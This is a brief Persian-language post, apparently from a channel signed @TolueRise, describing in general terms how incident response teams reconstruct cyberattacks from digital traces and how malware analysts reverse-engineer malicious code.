در جرایم سایبری، محققان امنیتی و تیمهای واکنش به رخدادها (CSIRT) باید از ردپاهای دیجیتالی استفاده کنند تا مراحل یک حمله را بازسازی کنند. همچنین، در مهندسی معکوس بدافزارها، تحلیلگران باید بفهمند که یک کد مخرب چگونه کار میکند و چه تغییراتی در سیستم ایجاد کرده است.
@TolueRise